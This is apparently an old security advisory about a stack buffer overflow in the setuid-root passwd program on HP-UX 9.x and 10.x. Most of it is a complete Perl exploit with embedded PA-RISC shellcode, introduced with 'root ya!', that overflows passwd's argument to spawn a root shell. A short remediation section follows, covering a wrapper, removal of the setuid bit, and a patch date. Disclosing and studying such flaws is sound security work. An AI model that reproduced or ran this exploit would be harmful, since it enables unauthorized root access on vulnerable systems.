COMMAND

    /bin/passwd

SYSTEMS AFFECTED

    HP/UX 9.X, 10.X (not 10.20)

PROBLEM

    Due  to  insufficient  bounds  checking  on  arguments  which  are
    supplied by users, it is possible to overwrite the internal  stack
    space of the passwd program  while it is executing.   By supplying
    a carefully  designed argument  to the  passwd program,  intruders
    may be  able to  force passwd  to execute  arbitrary commands.  As
    passwd is  setuid root,  it may  allow intruders  to run arbitrary
    commands with root privileges.

    By default, a dynamically linked version of the passwd program  is
    found in /bin under HP-UX 9.x and in /usr/bin under HP-UX 10.x.  A
    statically linked version is  also available under HP-UX  10.x and
    is located in /sbin.

    Thanks to that and following SOD's exploit, root ya!

        #!/usr/bin/perl

        # SOD /bin/passwd buffer overrun

        use FileHandle;

        sub h2cs {
          local($stuff)=@_;
          local($rv);
          while($stuff !~ /^$/) {
            $bob=$stuff;
            $bob =~ s/^(..).*$/$1/;
            $stuff =~ s/^..//;
            $rv.=chr(oct("0x${bob}"));
            }
          return $rv;
          }

        open(PIPE,"uname -r|");
        chop($rev=<PIPE>);
        close(PIPE);
        $rev =~ s/^.*\.(.*)\..*$/$1/;

        if ($rev eq "10") {
          $offset=2102;
          $prealign="AA"; # 2 byte pre
          $postalign=""; # 0 byte post
          $pcoq=h2cs("7b03b463");
          } else {
          $offset=2170; # 2170 works for 9.X...
          $prealign=""; # zero byte pre
          $postalign="PP"; # 2 byte post
          $pcoq=h2cs("7b033018");
          }

        $nop=h2cs("08210280");
        $code="";
        $code.=h2cs("34160506"); # LDI 643,r22
        $code.=h2cs("96d60534"); # SUBI 666,r22,r22
        $code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
        $code.=h2cs("e420e008"); # BLE 4(sr7,r1)
        $code.=h2cs("0b5a029a"); # XOR arg0,arg0,arg0
        $code.=h2cs("e83f1ffd"); # BL .+8,r1
        $code.=h2cs("08210280"); # NOP
        $code.=h2cs("34020102"); # LDI 129,rp
        $code.=h2cs("08410402"); # SUB r1,rp,rp
        $code.=h2cs("60400162"); # STB r0,177(rp)
        $code.=h2cs("b45a0154"); # ADDI 170,rp,arg0
        $code.=h2cs("0b390299"); # XOR arg1,arg1,arg1
        $code.=h2cs("0b180298"); # XOR arg2,arg2,arg2
        $code.=h2cs("341604be"); # LDI 607,r22
        $code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
        $code.=h2cs("e420e008"); # BLE 4(sr7,r1)
        $code.=h2cs("96d60534"); # SUB 666,r22,r22
        $code.=h2cs("deadcafe"); # Illegal instruction -- dump core if exec fails
        $data="/bin/sh."; # Data stuff

        $codedata=$code.$data;
        $num=int(($offset-length($code)-length($data)-4)/4);
        $pre="$nop"x$num;
        $of=$prealign;
        $of.=$pre.$code.$data.$postalign.$pcoq;
        exec("/bin/passwd","$of");

SOLUTION

    1 Install passwd wrapper
    2 Remove setuid and non-root execute permissions on /sbin/passwd

        # ls -l /sbin/passwd
        -r-sr-xr-x   1 root   bin  487424 Jun 10 17:00 /sbin/passwd

        # chmod 500 /sbin/passwd
        # ls -l /sbin/passwd
        -r-x------   1 root   bin  487424 Jun 10 17:00 /sbin/passwd

    Note this will  remove the ability  for non-root users  to execute
    /sbin/passwd.

    After 08. January patch for 9.x will be available, while for  10.x
    patch will be available before this term.